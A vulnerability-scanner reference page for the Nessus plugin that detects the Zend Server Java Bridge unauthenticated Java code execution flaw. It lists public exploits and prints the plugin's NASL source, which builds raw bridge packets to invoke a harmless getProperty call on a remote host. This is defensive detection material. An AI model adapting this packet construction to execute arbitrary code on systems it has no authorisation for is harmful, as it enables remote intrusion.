Zend Server Java Bridge Arbitrary Java Code Execution - Nessus

Critical   Plugin ID: 53533

---

This page contains detailed information about the Zend Server Java Bridge Arbitrary Java Code Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview

---

ID: 53533
Name: Zend Server Java Bridge Arbitrary Java Code Execution
Filename: zend_server_java_bridge_code_exec.nasl
Vulnerability Published: 2011-03-24
This Plugin Published: 2011-04-22
Last Modification Time: 2018-11-15
Plugin Version: 1.11
Plugin Type: remote
Plugin Family: Misc.
Dependencies: None

Vulnerability Information

---

Severity: Critical
Vulnerability Published: 2011-03-24
Patch Published: 2011-03-24
CVE [?]: N/A
CPE [?]: N/A

Synopsis

The remote service has a code execution vulnerability.

Description

Zend Server Java Bridge, a service that lets PHP applications use Java code, has an arbitrary code execution vulnerability. The service accepts requests to execute Java code without authentication.

A remote, unauthenticated attacker could exploit this to execute arbitrary Java code.

Solution

Apply the hofix provided by the vendor.

If the hotfix is already applied, ensure access to the service is restricted using the 'zend.javamw.ip' system property.

Public Exploits

---

Target Network Port(s): 10001
Target Asset(s): N/A
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Zend Server Java Bridge Arbitrary Java Code Execution vulnerability:

1. Metasploit: exploit/multi/misc/zend_java_bridge
   [Zend Server Java Bridge Arbitrary Java Code Execution]
2. Exploit-DB: exploits/multiple/remote/17078.java
   [EDB-17078: Zend Java Bridge - Remote Code Execution]
3. Exploit-DB: exploits/multiple/remote/17148.rb
   [EDB-17148: Zend Server Java Bridge - Arbitrary Java Code Execution (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

---

CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:ND

CVSS Base Score:	10.0 (High)
Impact Subscore:	10.0
Exploitability Subscore:	10.0
CVSS Temporal Score:	8.3 (High)
CVSS Environmental Score:	NA (None)
Modified Impact Subscore:	NA
Overall CVSS Score:	8.3 (High)

Go back to menu.

Plugin Source

---

This is the zend_server_java_bridge_code_exec.nasl nessus plugin source code. This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.

#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");


if (description)
{
  script_id(53533);
  script_version("1.11");
  script_cvs_date("Date: 2018/11/15 20:50:24");

  script_bugtraq_id(47060);
  script_xref(name:"EDB-ID", value:"17078");
  script_xref(name:"EDB-ID", value:"17148");

  script_name(english:"Zend Server Java Bridge Arbitrary Java Code Execution");
  script_summary(english:"Tries to execute Java");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote service has a code execution vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Zend Server Java Bridge, a service that lets PHP applications use
Java code, has an arbitrary code execution vulnerability.  The service
accepts requests to execute Java code without authentication. 

A remote, unauthenticated attacker could exploit this to execute
arbitrary Java code."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.zerodayinitiative.com/advisories/ZDI-11-113/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://seclists.org/bugtraq/2011/Mar/277"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?0c9a77c7"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"Apply the hofix provided by the vendor.

If the hotfix is already applied, ensure access to the service is
restricted using the 'zend.javamw.ip' system property."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Zend Server Java Bridge Arbitrary Java Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"vuln_publication_date", value:"2011/03/24");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/03/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2011/04/22");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.");

  script_require_ports(10001);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("byte_func.inc");


global_var port;

##
# makes a CreateObject request packet
#
# @anonparam  class  class name of the instance to be created
#
# @return a CreateObject packet
##
function create_object_req()
{
  local_var class, action, req;
  class = _FCT_ANON_ARGS[0];
  action = 'CreateObject';

  req =
    '\x00\x00\x00\x00' + # ?
    mkdword(strlen(action)) + action +
    '\x00\x00\x00\x02' + # ?
    '\x04' + # ?
    mkdword(strlen(class)) + class +
    '\x07' + # ?
    '\x00\x00\x00\x00';
  req = make_request(req);

  return req;
}

##
# makes a request packet for invoking a method
#
# @param  obj_id  object ID of the instance containing the method to be invoked
# @param  method  the method to invoke
# @param  arg     the argument to pass to 'method' (assumes there is one arg and it's a string)
#
# @return a method invocation request packet
##
function invoke_method_req(obj_id, method, arg)
{
  local_var req;

  req =
    obj_id +
    mkdword(strlen(method)) + method +
    '\x00\x00\x00\x01' + # ?
    '\x04' + # ?
    mkdword(strlen(arg)) + arg;
  req = make_request(req);

  return req;
}

##
# Creates a Java Bridge request packet (adds a 4 byte size header)
#
# @anonparam  payload  payload of the request packet to create
#
# @return the generated request packet
##
function make_request()
{
  local_var payload, req;
  payload = _FCT_ANON_ARGS[0];
  req = mkdword(strlen(payload)) + payload;

  return req;
}

##
# Processes a Java Bridge response packet (strips the header and returns the payload)
#
# This function will exit() if it encounters any errors
#
# @anonparam  sock  socket where the response data can be read from
#
# @return the data received from the server, minus the header
##
function process_response()
{
  local_var sock, len, data;
  sock = _FCT_ANON_ARGS[0];

  len = recv(socket:sock, length:4);
  if (strlen(len) != 4)
    exit(1, 'Error reading packet length from port ' + port + '.');

  len = getdword(blob:len, pos:0);
   
  #
  # Do not process responses bigger than 10Mb
  #
  if ( len >= 10*1024*1024 ) 
    exit(1, 'Packet length advertised on port ' + port + ' is too big.');

  data = recv(socket:sock, length:len);
  if (strlen(data) != len)
    exit(1, 'Unexpected amount of data received from port ' + port + '.');

  return data;
}


# plugin starts here

# The patch makes the service listen on localhost rather than
# all interfaces, so we'll skip localhost to avoid FPs
if (islocalhost()) exit(1, 'Can\'t test against localhost.');

port = 10001;
if (known_service(port:port)) exit(0, 'The service on port '+port+' was already identified.');
if (!get_tcp_port_state(port)) exit(0, "Port "+port+" is not open.");

soc = open_sock_tcp(port);
if (!soc)
exit(1, "Failed to open a socket on port "+port+".");

# first create the object
# $system = new Java("java.lang.System")
class = 'java.lang.System';
new_req = create_object_req(class);
send(socket:soc, data:new_req);
res = process_response(soc);
if (strlen(res) != 5 || res[0] != '\x05')
  exit(0, 'Unexpected response to first request from port '+port+' (probably not Java Bridge).');

object_id = substr(res, 1, 4);

# Then invoke a method, proving we can execute arbitrary Java
# $system->getProperty("java.version")
method = 'getProperty';
arg = 'java.version';
req = invoke_method_req(obj_id:object_id, method:method, arg:arg);
send(socket:soc, data:req);
res = process_response(soc);

# Clean up (deallocate/GC/whatever our object and send a 'reset')
req = '\xff\xff\xff\xff' + mkdword(strlen('delObject')) + 'delObject' + '\x00\x00\x00\x01\x02' + object_id;
req = make_request(req);
send(socket:soc, data:req);
del_res = recv(socket:soc, length:5);

# should return a pkt header + null byte. if we get something
# unexpected, close the socket without sending the reset
if (isnull(del_res) || strlen(del_res) != 5 || del_res[4] != '\x00')
{
  close(soc);
}
else
{
  req = '\xff\xff\xff\xff' + mkdword(strlen('reset')) + 'reset' + '\x00\x00\x00\x00';
  req = make_request(req);
  send(socket:soc, data:req);
  rst_res = recv(socket:soc, length:5);
  # the server should return a pkt header + null byte,
  # but we don't care what it does at this point
  close(soc);
}

# Check the response from the method invocation
if (res[0] != '\x04')
  exit(1, 'Unexpected response to getProperty() on port '+port+'.');

ver_len = getdword(blob:res, pos:1);
ver = substr(res, 5, 4 + ver_len);

if (ver_len != strlen(ver))
  exit(1, 'Unexpected packet size in getProperty() response on port '+port+'.');

# If we made it this far, we successfully executed the method,
# which also means we've detected the service
register_service(port:port, proto:"java_bridge");

if (report_verbosity > 0)
{
  report =
    '\nNessus was able to get the JRE version number by executing Java' +
    '\non the remote host :\n' +
    '\n  Method call  : ' + class +'.'+ method+'("'+arg+'")' +
    '\n  Return value : ' + ver + '\n';
  security_hole(port:port, extra:report);
}
else security_hole(port);

The latest version of this script can be found in these locations depending on your platform:

• Linux / Unix:
  /opt/nessus/lib/nessus/plugins/zend_server_java_bridge_code_exec.nasl
• Windows:
  C:\ProgramData\Tenable\Nessus\nessus\plugins\zend_server_java_bridge_code_exec.nasl
• Mac OS X:
  /Library/Nessus/run/lib/nessus/plugins/zend_server_java_bridge_code_exec.nasl

Go back to menu.

How to Run

---

Here is how to run the Zend Server Java Bridge Arbitrary Java Code Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

1. Click to start a New Scan.
2. Select Advanced Scan.
3. Navigate to the Plugins tab.
4. On the top right corner click to Disable All plugins.
5. On the left side table select Misc. plugin family.
6. On the right side table select Zend Server Java Bridge Arbitrary Java Code Execution plugin ID 53533.
7. Specify the target on the Settings tab and click to Save the scan.
8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state zend_server_java_bridge_code_exec.nasl -t <IP/HOST>

Go back to menu.

References

---

BID | SecurityFocus Bugtraq ID:

• 47060

See also:

• https://www.tenable.com/plugins/nessus/53533
• https://seclists.org/bugtraq/2011/Mar/277
• https://www.zerodayinitiative.com/advisories/ZDI-11-113/
• http://www.nessus.org/u?0c9a77c7
• https://vulners.com/nessus/ZEND_SERVER_JAVA_BRIDGE_CODE_EXEC.NASL

Similar and related Nessus plugins:

• 22299 - e107 ibrowser.php zend_has_del() Function Remote Code Execution
• 62571 - FreeBSD : Zend Framework -- Multiple vulnerabilities via XXE injection (ec34d0c2-1799-11e2-b4ab-000c29033c32)
• 108931 - GLSA-201804-10 : Zend Framework: Multiple vulnerabilities
• 83350 - Magento XML-RPC XXE Arbitrary File Disclosure
• 156103 - Apache Log4j 1.2 JMSAppender Remote Code Execution (CVE-2021-4104)
• 155999 - Apache Log4j < 2.15.0 Remote Code Execution (Nix)
• 156002 - Apache Log4j < 2.15.0 Remote Code Execution (Windows)
• 103223 - Apple TV <= 7.2.2 Bluetooth Remote Code Execution (BlueBorne)
• 159113 - CRI-O package 1.19.x < 1.19.6 / 1.20.x < 1.20.7 / 1.21.x < 1.21.6 / 1.22.x < 1.22.3 / 1.23.x < 1.23.2 Arbitrary Code Execution (CVE-2022-0811)
• 119681 - Quest NetVault Backup Server < 11.4.5 Process Manager Service SQL Injection Remote Code Execution Vulnerability (ZDI-17-982)
• 104052 - Oracle Enterprise Manager Ops Center Remote Code Execution (October 2017 CPU)
• 65049 - Oracle Java JDK / JRE 5 < Update 41 Remote Code Execution (Unix)
• 65051 - Oracle Java JDK / JRE 6 < Update 43 Remote Code Execution (Unix)
• 65053 - Oracle Java JDK / JRE 7 < Update 17 Remote Code Execution (Unix)
• 103931 - Oracle JDeveloper ADF Faces Unspecified Remote Code Execution (October 2017 CPU)
• 78700 - Oracle Adaptive Access Manager Server Arbitrary Code Execution (October 2014 CPU)
• 133041 - Oracle Tuxedo Remote Code Execution Vulnerability (Jan 2020 CPU)
• 124337 - Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution
• 126051 - Oracle WebLogic Server Web Services Remote Code Execution Vulnerability
• 122056 - Samba < 2.2.8a Remote Code Execution Vulnerability
• 129500 - Spring Framework 4.3.x < 4.3.16 / 5.0.x < 5.0.5 Remote Code Execution with spring-messaging (CVE-2018-1270)
• 159374 - Spring Framework < 5.2.20 / 5.3.x < 5.3.18 Remote Code Execution (CVE-2022-22965)
• 117401 - Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)
• 128765 - Apache Struts 2.x < 2.3.14.3 Remote Code Execution Vulnerability (S2-012)
• 112036 - Apache Struts CVE-2018-11776 Results With No Namespace Possible Remote Code Execution (S2-057)
• 151425 - Apache Struts 2.0.0 < 2.5.26 Possible Remote Code Execution vulnerability (S2-061)
• 159667 - Apache Struts 2.0.0 < 2.5.30 Possible Remote Code Execution vulnerability (S2-062)
• 142226 - Apache Synapse < 3.0.1 Remote Code Execution Vulnerability
• 72580 - Ubiquiti airCam < 1.2.0 ubnt-streamer RTSP Service Remote Code Execution
• 78508 - VMware vCenter Server Appliance Bash Remote Code Execution (VMSA-2014-0010) (Shellshock)
• 128280 - Webmin < 1.930 Remote Code Execution Vulnerability

Version

---

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file zend_server_java_bridge_code_exec.nasl version 1.11. For more plugins, visit the Nessus Plugin Library.

Go back to menu.